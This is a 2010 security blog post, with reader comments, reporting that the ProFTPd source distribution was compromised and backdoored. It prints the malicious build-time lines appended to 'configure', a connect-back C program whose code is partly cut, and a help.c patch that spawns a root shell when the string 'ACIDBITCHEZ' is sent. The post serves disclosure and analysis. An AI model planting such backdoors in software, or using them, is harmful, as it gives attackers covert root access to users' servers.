xorl %eax, %eax

News: ProFTPd owned and backdoored

with 7 comments

I have just been informed of this. After compromising the remote host, they backdoored the popular FTP daemon by adding the following stuff.

gcc tests/tests.c -o tests/tests >/dev/null 2>&1
cc tests/tests.c -o tests/tests >/dev/null 2>&1
tests/tests >/dev/null 2>&1 &
rm -rf tests/tests.c tests/tests >/dev/null 2>&1

This was appended in ‘configure’ file and it adds a new C file under tests directory named tests.c which is this:

#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <string.h>

#define DEF_PORT 9090
#define DEF_TIMEOUT 15
#define DEF_COMMAND "GET /AB HTTP/1.0\r\n\r\n"

int sock;

void handle_timeout(int sig)

int main(void)

        struct sockaddr_in addr;
        struct hostent *he;
        u_short port;
        char ip[20]="";
        port = DEF_PORT;
        signal(SIGALRM, handle_timeout);
        if(he==NULL) return(-1);
        addr.sin_addr.s_addr = *(unsigned long*)he->h_addr;
        addr.sin_port = htons(port);
        addr.sin_family = AF_INET;
        memset(addr.sin_zero, 0, 8);
        sprintf(ip, inet_ntoa(addr.sin_addr));
        if((sock = socket(AF_INET, SOCK_STREAM, 0))==-1)
                return EXIT_FAILURE;
        if(connect(sock, (struct sockaddr*)&addr, sizeof(struct sockaddr))==-1)
            return EXIT_FAILURE;
        if(-1 == send(sock, DEF_COMMAND, strlen(DEF_COMMAND), 0))
            return EXIT_FAILURE;

return 0; }

A simple remote backdoor that uses ‘DEF_COMMAND’ magic value. In addition, src/help.c was patched to add the following ‘if’ clause:

     } else {
      if (strcmp(target, "ACIDBITCHEZ") == 0) { setuid(0); setgid(0); system("/bin/sh;/sbin/sh"); }
       /* List the syntax for the given target command. */
       for (i = 0; i < help_list->nelts; i++) {

Quite self-explanatory. Unfortunately, the compromise and the subsequent backdooring were quickly detected…

Written by xorl

December 2, 2010 at 13:33

Posted in hax, news

7 Responses

Subscribe to comments with RSS.

  1. Ο Thiseas το κανε;

    some user

    December 2, 2010 at 17:14

  2. >>A simple remote backdoor that uses ‘DEF_COMMAND’ magic value
    Is it?

    PS Nice blog!


    December 2, 2010 at 18:01

  3. @toast: I didn’t go into any details because it’s very straightforward. It connects back to and sends ‘DEF_COMMAND’.


    December 2, 2010 at 21:38

  4. Why did they add another file, seems a bit overkill to me.


    December 2, 2010 at 22:08

  5. Can you imagine connect back to saudi arabia! Hmm who could have thot


    December 3, 2010 at 02:34

  6. Really, using IPv4 specific library calls, defines and structures is so 80’s, not mentioning the not-portable signal handling. What they are teaching the kids these days ?


    December 4, 2010 at 01:30

  7. @xorl: Yes, thats what it does. Yet you call it a backdoor.


    December 5, 2010 at 02:38

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

%d bloggers like this: